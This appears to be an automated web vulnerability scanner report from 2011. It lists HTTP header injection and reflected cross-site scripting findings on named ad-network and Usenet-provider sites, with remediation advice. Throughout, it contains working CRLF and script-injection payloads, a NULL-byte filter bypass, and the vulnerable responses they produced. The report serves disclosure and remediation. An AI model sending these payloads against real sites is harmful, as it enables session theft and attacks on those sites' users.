HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 2 is copied into the Location response header. The payload b0624%0d%0ab55b04ac9a8 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /pixel/b0624%0d%0ab55b04ac9a8/2PEGT3UB35E6RMJYTASSQH?pv=709723867.4759865&cookie=&keyw= HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.snapengage.com/plans
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Tue, 02 Aug 2011 11:22:39 GMT
Connection: keep-alive
Set-Cookie: __adroll=4d9ea333e1878cefa789df91cebf503e; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/b0624
b55b04ac9a8/2PEGT3UB35E6RMJYTASSQH/FWOQF77OPZHKJHKC2K6BJZ.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate
The value of REST URL parameter 3 is copied into the Location response header. The payload 5abc0%0d%0ae08b623f322 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /pixel/CIF4HHWJRFFZXJ6A7DZHTI/5abc0%0d%0ae08b623f322?pv=709723867.4759865&cookie=&keyw= HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.snapengage.com/plans
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Tue, 02 Aug 2011 11:22:40 GMT
Connection: keep-alive
Set-Cookie: __adroll=4d9ea333e1878cefa789df91cebf503e; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/retarget/CIF4HHWJRFFZXJ6A7DZHTI/5abc0
e08b623f322/pixel.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate
2. Cross-site scripting (reflected)
There are 210 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the adult_access request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54739"><script>alert(1)</script>f5ece6155aa was submitted in the adult_access parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<head> <title>Newsguy - Open a Newsgroup Account</title> <meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space, software, archives, art & music galleries, feature c ...[SNIP]... <input type="hidden" name="adult_access" value="yes54739"><script>alert(1)</script>f5ece6155aa"> ...[SNIP]...
The value of the iaccess request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fb47"><script>alert(1)</script>89203b485c9 was submitted in the iaccess parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<head> <title>Newsguy - Open a Newsgroup Account</title> <meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space, software, archives, art & music galleries, feature c ...[SNIP]... <input type="hidden" name="iaccess" value="f3fb47"><script>alert(1)</script>89203b485c9"> ...[SNIP]...
The value of the product request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 599c1"><script>alert(1)</script>7b6ecef1952 was submitted in the product parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<head> <title>Newsguy - Open a Newsgroup Account</title> <meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space, software, archives, art & music galleries, feature c ...[SNIP]... <input type="hidden" name="product" value="11117599c1"><script>alert(1)</script>7b6ecef1952"> ...[SNIP]...
The value of the refer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b17fb"><script>alert(1)</script>87b0527d55f was submitted in the refer parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<head> <title>Newsguy - Open a Newsgroup Account</title> <meta NAME="description" CONTENT="Access to Usenet newsgroups, email accounts, web space, software, archives, art & music galleries, feature c ...[SNIP]... <input type="hidden" name="refer" value="b17fb"><script>alert(1)</script>87b0527d55f"> ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe518"-alert(1)-"940200817b0 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6293
Date: Wed, 03 Aug 2011 13:12:57 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 2362466/300x250-home-free.png"; var minV = 8; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843fe518"-alert(1)-"940200817b0&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307 ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3c08'-alert(1)-'694d2b5e093 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6293
Date: Wed, 03 Aug 2011 13:13:02 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843e3c08'-alert(1)-'694d2b5e093&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307 ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58fdc"-alert(1)-"a25eb4d0da was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6289
Date: Wed, 03 Aug 2011 13:13:28 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... inV = 8; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=189858050558fdc"-alert(1)-"a25eb4d0da&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dc/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7 ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66c23'-alert(1)-'8ecd3b658ad was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6293
Date: Wed, 03 Aug 2011 13:13:34 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=189858050566c23'-alert(1)-'8ecd3b658ad&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7 ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ea4b'-alert(1)-'20c252c7b3 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6289
Date: Wed, 03 Aug 2011 13:13:59 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... et=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f9ea4b'-alert(1)-'20c252c7b3&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dc/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7Esscs%3D%3fhttp://www.morethan.com/Pages/Product ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a943d"-alert(1)-"51f858c998 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6289
Date: Wed, 03 Aug 2011 13:13:54 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68fa943d"-alert(1)-"51f858c998&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dc/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7Esscs%3D%3fhttp://www.morethan.com/Pages/Product ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00a4bc4'-alert(1)-'19ce244ece3 was submitted in the PG parameter. This input was echoed as a4bc4'-alert(1)-'19ce244ece3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6305
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 03 Aug 2011 13:13:49 GMT
Expires: Wed, 03 Aug 2011 13:13:49 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO%00a4bc4'-alert(1)-'19ce244ece3&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/e0/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7Esscs%3D%3 ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00fc8ce"-alert(1)-"05ecbe75c42 was submitted in the PG parameter. This input was echoed as fc8ce"-alert(1)-"05ecbe75c42 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6305
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 03 Aug 2011 13:13:41 GMT
Expires: Wed, 03 Aug 2011 13:13:41 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO%00fc8ce"-alert(1)-"05ecbe75c42&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/e0/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7Esscs%3D%3 ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9382f'-alert(1)-'79b3021c1ab was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6293
Date: Wed, 03 Aug 2011 13:13:23 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=532360819382f'-alert(1)-'79b3021c1ab&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/4080 ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ada41"-alert(1)-"0e77f79419f was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6293
Date: Wed, 03 Aug 2011 13:13:18 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... e.png"; var minV = 8; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081ada41"-alert(1)-"0e77f79419f&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/4080 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1035a'-alert(1)-'0f70069ec78 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6293
Date: Wed, 03 Aug 2011 13:13:13 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G1035a'-alert(1)-'0f70069ec78&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/2 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85755"-alert(1)-"a3b4d6a09cc was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6293
Date: Wed, 03 Aug 2011 13:13:08 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 6/300x250-home-free.png"; var minV = 8; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G85755"-alert(1)-"a3b4d6a09cc&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/2 ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d150"-alert(1)-"1af3a768ac2 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6293
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 03 Aug 2011 13:14:04 GMT
Expires: Wed, 03 Aug 2011 13:14:04 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=1d150"-alert(1)-"1af3a768ac2http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7Esscs%3D%3fhttp://www.morethan.com/Pages/Products/Home/HomeHo ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bf49'-alert(1)-'35eddab7d06 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6293
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 03 Aug 2011 13:14:10 GMT
Expires: Wed, 03 Aug 2011 13:14:10 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=3bf49'-alert(1)-'35eddab7d06http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66837321%3B4307-300/250%3B40784334/40802121/1%3B%3B%7Esscs%3D%3fhttp://www.morethan.com/Pages/Products/Home/HomeHo ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a62d'-alert(1)-'10725b25213 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6293 Date: Wed, 03 Aug 2011 13:12:51 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!8a62d'-alert(1)-'10725b25213&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bdf6"-alert(1)-"e20e390bb3b was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6293 Date: Wed, 03 Aug 2011 13:12:46 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 17 03:56:05 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... /s0.2mdn.net/2362466/300x250-home-free.png"; var minV = 8; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/115000000000046072.1?!2bdf6"-alert(1)-"e20e390bb3b&&PID=8882843&UIT=G&TargetID=53236081&AN=1898580505&PG=UK9MMO&ASID=93abce88df6b47fe85d791d33a2ea68f&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/dd/%2a/h%3B243138191%3B0-0%3B0%3B66 ...[SNIP]...
